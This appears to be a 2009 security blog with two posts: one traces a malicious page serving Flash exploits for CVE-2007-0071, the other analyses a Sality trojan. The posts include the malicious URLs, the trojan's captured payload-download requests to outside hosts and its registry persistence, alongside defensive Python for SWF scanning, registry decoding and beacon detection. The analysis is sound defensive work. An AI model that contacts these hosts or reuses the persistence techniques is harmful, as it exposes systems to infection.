May 14, 2009

Malicious Site containing SWF:CVE-2007-0071

Malicious Site:http://jjxp22.cn/a/iqq.html
Someone submitted this malicious link "http://jjxp22.cn/a/iqq.html" to me. It seems to be a pop-up or hidden link from some compromised sites.

After checking the page source, I found an obfuscated JavaScript (shown below).

Obfuscated JavaScript

I de-obfuscated the JavaScript and found that it uses Deconcept's SWFObject to embed malicious Shockwave Flash files that exploit the integer overflow vulnerability in Adobe Flash Player 9.0.115.0 and earlier (CVE-2007-0071), which allows remote attackers to execute arbitrary code.

The malicious Flash files (6 of them, listed in the script below) exploit the Flash Player and download malicious executable files onto the victim's system from various websites.
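Because the de-obfuscated script and the SWF files are only shown as screenshots here, the following Python is an added example (not code from this post or from the malicious site) of how a defender can triage SWF files for the tag this vulnerability lives in. CVE-2007-0071 is an integer overflow in the handling of the SceneCount field of the DefineSceneAndFrameLabelData tag (tag type 86). The scanner walks the tag list of an uncompressed (FWS) or zlib-compressed (CWS) file and flags any tag 86 whose declared SceneCount cannot possibly fit in the tag body. Both sample SWFs are constructed inside the block; the builder only emits short-form tag headers, which is enough for the samples.

```python
import struct
import zlib

TAG_END = 0
TAG_DEFINE_SCENE_AND_FRAME_LABEL_DATA = 86   # the tag whose SceneCount CVE-2007-0071 abuses


def read_encoded_u32(body, pos):
    """Decode an SWF EncodedU32 (7 data bits per byte, high bit = continue, max 5 bytes)."""
    value, shift = 0, 0
    for _ in range(5):
        if pos >= len(body):
            raise ValueError("truncated EncodedU32")
        b = body[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            break
        shift += 7
    return value & 0xFFFFFFFF, pos


def swf_tags(swf):
    """Yield (tag_code, tag_body) for each tag of an FWS (plain) or CWS (zlib) SWF file."""
    if swf[:3] == b"CWS":
        data = swf[:8] + zlib.decompress(swf[8:])  # the 8-byte header stays in clear
    elif swf[:3] == b"FWS":
        data = swf
    else:
        raise ValueError("not an SWF file")
    pos = 8
    nbits = data[pos] >> 3                       # RECT: 5-bit Nbits, then four Nbits-wide fields
    pos += (5 + 4 * nbits + 7) // 8
    pos += 4                                     # FrameRate (u16) + FrameCount (u16)
    while pos + 2 <= len(data):
        code_and_len = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        code, length = code_and_len >> 6, code_and_len & 0x3F
        if length == 0x3F:                       # long form: a u32 length follows
            length = struct.unpack_from("<I", data, pos)[0]
            pos += 4
        yield code, data[pos:pos + length]
        pos += length
        if code == TAG_END:
            break


def scan_scene_tags(swf):
    """Return (scene_count, body_len) for every tag 86 whose SceneCount cannot fit its body."""
    findings = []
    for code, body in swf_tags(swf):
        if code != TAG_DEFINE_SCENE_AND_FRAME_LABEL_DATA:
            continue
        scene_count, pos = read_encoded_u32(body, 0)
        # each scene needs at least one Offset byte plus the NUL of an empty Name string
        if scene_count > (len(body) - pos) // 2:
            findings.append((scene_count, len(body)))
    return findings


# --- constructed samples (not files from the site analysed above) -------------------
def make_tag(code, body):
    """Short-form tag header (body shorter than 63 bytes)."""
    return struct.pack("<H", (code << 6) | len(body)) + body


def build_swf(tags, compress=False):
    rect = bytes([15 << 3]) + bytes(8)          # Nbits=15 -> 65 bits -> 9 bytes, all-zero stage
    frame = struct.pack("<HH", 0x1800, 1)       # 24.0 fps (8.8 fixed point), one frame
    body = rect + frame + b"".join(tags) + make_tag(TAG_END, b"")
    payload = zlib.compress(body) if compress else body
    return (b"CWS" if compress else b"FWS") + bytes([9]) + struct.pack("<I", 8 + len(body)) + payload


BENIGN_SCENE = bytes([1, 0]) + b"scene\x00" + bytes([0])   # 1 scene at offset 0, 0 frame labels
HUGE_SCENE = bytes([0xFF, 0xFF, 0xFF, 0xFF, 0x0F])         # SceneCount = 0xFFFFFFFF, no scene data


def demo():
    benign = build_swf([make_tag(TAG_DEFINE_SCENE_AND_FRAME_LABEL_DATA, BENIGN_SCENE)])
    hostile = build_swf([make_tag(TAG_DEFINE_SCENE_AND_FRAME_LABEL_DATA, HUGE_SCENE)], compress=True)
    return scan_scene_tags(benign), scan_scene_tags(hostile)


if __name__ == "__main__":
    print(demo())   # ([], [(4294967295, 5)])
```

The check is deliberately structural rather than signature-based: a SceneCount larger than the tag body can hold is never produced by an authoring tool, so it can be applied to every tag 86 regardless of how the surrounding file was obfuscated or compressed.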

De-obfuscated JavaScript

Sample Flash file info
###############

Filename: i16.swf
Size: 17897
MD5: 426969FD0D7324EE170D6F46BDB203B6
Virus Found: Bloodhound.Exploit.193 (Symantec)

On the VirusTotal website, 13 out of 39 AV detected it (Shown Below).

VirusTotal

From the "Who-is" record, the IP (61.164.108.35) belongs to RuiAn Telecom (China).

Who-is record

May 5, 2009

Malware analysis: Trojan W32/Sality

I received a suspicious file from my colleague this morning and did a simple behaviour analysis on it.

Analysis Report:
##############

Filename: ~.exe
MD5: 3A03A20BFEFE3FDD01659D47D2ED76C8
Virus Found: W32/Sality (McAfee), TROJ_DLOADER.XOP (TrendMicro), Mal/Generic-A (Sophos), Trojan-Downloader.Win32.Agent.brxr (Kaspersky, F-Secure).

On the VirusTotal website, 36 out of 40 AV detected it (details).



Registry values added:
================
1> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"

2> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"

The two registry values above add the malware to the Windows Firewall authorized-applications list (all scopes, Enabled) under the innocuous-looking name "ipsec" (shown above).

3> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\24: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00

4> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.xml\1: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00

5> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\~.rkr: 08 00 00 00 06 00 00 00 80 F4 57 31 2D CD C9 01

6> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\system32\SHELL32.dll,-22913: "Shows the disk drives and hardware connected to this computer."

7> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\~.exe: "~"

Registry values modified:
==================
1> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000010

2> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000011

3> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe"

4> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe""

5> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000039

6> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000003A

7> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000039

8> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000003A
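Several of the values in the two lists above are stored in encodings that have to be decoded before they say anything: the firewall exception is a "path:scope:state:name" string, the UserAssist value name is ROT13 and its data is a 16-byte session/count/FILETIME record, the RecentDocs value starts with a UTF-16LE name followed by a shell item, and the Winlogon Shell value is a command line. The following Python is an added example, not part of the original write-up. The sample values are copied from the entries above; the assumptions it relies on are the Windows XP UserAssist record layout (the run counter is stored with an offset of 5) and the documented 0x32 file-entry shell item layout for the .lnk name.

```python
import codecs
import ntpath
import re
import struct
from datetime import datetime, timedelta, timezone

# Copies of the values reported in this analysis (constructed here as test input).
FIREWALL_VALUE = r"C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"
USERASSIST_NAME = r"HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\~.rkr"
USERASSIST_DATA = bytes.fromhex("08 00 00 00 06 00 00 00 80 F4 57 31 2D CD C9 01")
RECENTDOCS_DATA = bytes.fromhex(
    "73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 "
    "00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 "
    "EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 "
    "6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00"
)
WINLOGON_SHELL = r'Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe"'


def parse_firewall_exception(value):
    """Split an AuthorizedApplications\\List value ('path:scope:state:name') into its fields."""
    path, scope, state, name = value.rsplit(":", 3)   # rsplit so the drive colon survives
    exe = ntpath.splitext(ntpath.basename(path))[0]
    return {"path": path, "scope": scope, "state": state, "name": name,
            # an exception whose display name says nothing about the binary is worth a look
            "name_mismatch": exe.lower() != name.lower()}


def decode_userassist(name, data):
    """ROT13 the value name and unpack the XP-era record: session id, count, FILETIME."""
    entry = codecs.decode(name, "rot_13")
    session, count, filetime = struct.unpack("<IIQ", data[:16])
    # FILETIME counts 100 ns intervals since 1601-01-01 UTC
    last_run = datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)
    return {"entry": entry, "session": session, "raw_count": count,
            "runs": max(count - 5, 0),           # assumption: XP stores the counter offset by 5
            "last_run": last_run.strftime("%Y-%m-%d %H:%M:%S UTC")}


def decode_recentdocs(data):
    """Display name (UTF-16LE, NUL-terminated) plus the .lnk name in the shell item after it."""
    end = 0
    while data[end:end + 2] != b"\x00\x00":
        end += 2
    display = data[:end].decode("utf-16-le")
    item = data[end + 2:]
    # assumption: 0x32 file-entry item = u16 size, u8 type, u8 pad, u32 size, u32 FAT time,
    # u16 attributes, then the NUL-terminated ANSI primary name
    lnk = None
    if len(item) > 14 and item[2] & 0x70 == 0x30:
        lnk = item[14:item.index(b"\x00", 14)].decode("ascii")
    return {"display": display, "lnk": lnk}


def winlogon_shell_extras(value):
    """Everything in Winlogon\\Shell that is not explorer.exe; a non-empty list is persistence."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', value)]
    return [t for t in tokens if ntpath.basename(t).lower() != "explorer.exe"]


if __name__ == "__main__":
    print(parse_firewall_exception(FIREWALL_VALUE))
    print(decode_userassist(USERASSIST_NAME, USERASSIST_DATA))
    print(decode_recentdocs(RECENTDOCS_DATA))
    print(winlogon_shell_extras(WINLOGON_SHELL))
```

Run against the values above, the UserAssist entry decodes to UEME_RUNPATH:C:\Documents and Settings\Owner\Desktop\~.exe with session 8, a raw count of 6 (one execution under the XP offset assumption) and a last-run time of 2009-05-05 02:57:14 UTC, which matches the date of this analysis; the firewall entry is flagged because the name "ipsec" does not match the executable it authorises, and the Shell value yields the dropped binary as the extra program started at logon.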

Files modified:
==========
1> C:\Documents and Settings\Owner\Cookies\index.dat

2> C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat

3> C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat

4> C:\WINDOWS\system.ini

5> C:\WINDOWS\system32\config\software.LOG

6> C:\WINDOWS\system32\config\system.LOG

Other behaviours:
=============
System connecting to:
1> peskostruikaz.com:80
The following HTTP request was found:
GET /auq.php?8e54ce=1332546&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: peskostruikaz.com
Cache-Control: no-cache


2> johnsonbodyshop.com:80
No request after initial handshake.

3> shopatforgetmenot.com:80
The following HTTP request was found:
GET /images/mainlogo.gif?58fb0a=833062&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: shopatforgetmenot.com
Cache-Control: no-cache

4> corporateshelters.com:80
No request after initial handshake.

It seems the malware is trying to download additional malicious payloads from "peskostruikaz.com/auq.php" and "shopatforgetmenot.com/images/mainlogo.gif".
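The two requests above share more than a destination, and the habits they show are what a network defender would write detections on. The following Python is an added example, not part of the original analysis: it parses the captured requests (reproduced here as constructed strings) and applies three heuristics: a static-looking resource fetched with a query string, one parameter value reused across unrelated hosts (the "id" value in both requests), and the absence of request headers that every browser sends. The third rule encodes an assumption about browser behaviour, not something the capture itself states.

```python
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed copies of the two requests captured in the behaviour analysis above.
REQUESTS = [
    "GET /auq.php?8e54ce=1332546&id=2554099245826 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57\r\n"
    "Host: peskostruikaz.com\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n",
    "GET /images/mainlogo.gif?58fb0a=833062&id=2554099245826 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57\r\n"
    "Host: shopatforgetmenot.com\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n",
]

STATIC_EXTENSIONS = (".gif", ".jpg", ".jpeg", ".png", ".ico", ".css", ".js")
BROWSER_HEADERS = ("accept", "accept-language")   # assumption: a real browser always sends these


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, query dict and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "version": version, "path": url.path,
            "query": dict(parse_qsl(url.query, keep_blank_values=True)),
            "host": headers.get("host", ""), "headers": headers}


def triage(raw_requests):
    """Apply three beacon heuristics to a set of requests and return the findings."""
    requests = [parse_request(r) for r in raw_requests]
    findings = []
    # 1. a static-looking resource fetched with a query string is a common payload disguise
    for r in requests:
        if r["path"].lower().endswith(STATIC_EXTENSIONS) and r["query"]:
            findings.append(("static_with_query", r["host"], r["path"]))
    # 2. one parameter value repeated across different hosts behaves like a bot identifier
    hosts_by_param = defaultdict(set)
    for r in requests:
        for name, value in r["query"].items():
            hosts_by_param[(name, value)].add(r["host"])
    for (name, value), hosts in sorted(hosts_by_param.items()):
        if len(hosts) > 1:
            findings.append(("shared_id", name, value, tuple(sorted(hosts))))
    # 3. a request lacking the headers browsers send was most likely not made by a browser
    for r in requests:
        missing = tuple(h for h in BROWSER_HEADERS if h not in r["headers"])
        if missing:
            findings.append(("missing_browser_headers", r["host"], missing))
    return findings


if __name__ == "__main__":
    for finding in triage(REQUESTS):
        print(finding)
```

On the two captures this reports the ".gif" fetched with a query string, the "id" value shared by both hosts, and the missing Accept headers on each request; the shared identifier is the most durable of the three, since it ties the download attempts to one infected host even when the domains change.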